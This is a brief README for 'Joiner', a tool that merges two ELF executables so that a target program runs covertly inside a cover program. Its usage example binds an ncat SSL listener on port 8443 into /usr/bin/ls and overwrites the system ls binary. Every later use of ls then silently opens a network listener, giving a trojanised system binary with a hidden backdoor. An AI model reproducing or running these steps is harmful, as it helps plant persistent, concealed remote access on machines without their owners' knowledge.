# Joiner

Join two ELF files together - cover and target - to execute target 'covertish'.

```bash
make
./joiner /usr/bin/ls /usr/bin/ncat -l -k 0.0.0.0 8443 --ssl
chmod +x ls_joined
mv ls_joined /usr/bin/ls
ls
# now a ncat listener is spawned if everything went to plan
```
